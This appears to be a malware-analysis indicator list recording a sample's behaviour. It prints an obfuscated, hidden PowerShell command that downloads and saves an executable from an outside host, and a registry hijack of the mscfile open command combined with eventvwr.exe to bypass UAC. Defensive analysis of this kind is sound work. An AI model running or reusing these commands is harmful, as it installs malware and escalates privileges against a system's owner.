Technical Information
- https://u.teknik.io/ozhs4.exe as %temp%\\anyfilename.exe
- '<SYSTEM32>\cmd.exe' /C poWErSHell.ExE -wiNDoWSTyLE hIddEN -nOPROFiLe -ExECuTIoNPoLIcy ByPAsS (NEw-OBjeCT SySTEm.Net.WEBCliEnt).DOWnlOaDFiLe('https://u.teknik.io/OzhS4.exe','%TEMP%\\anyFileName.exe') & reg add HKCU...
- nul
- 'u.##knik.io':443
- 'x1.#.lencr.org':80
- http://x1.#.lencr.org/
- 'u.##knik.io':443
- DNS ASK u.##knik.io
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\reg.exe' add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\anyFileName.exe /f
- '<SYSTEM32>\eventvwr.exe'
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"
- '<SYSTEM32>\ping.exe' -n 15 127.0.0.1
- '<SYSTEM32>\cmd.exe' /C poWErSHell.ExE -wiNDoWSTyLE hIddEN -nOPROFiLe -ExECuTIoNPoLIcy ByPAsS (NEw-OBjeCT SySTEm.Net.WEBCliEnt).DOWnlOaDFiLe('https://u.teknik.io/OzhS4.exe','%TEMP%\\anyFileName.exe') & reg add HKCU...' (with hidden window)
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"' (with hidden window)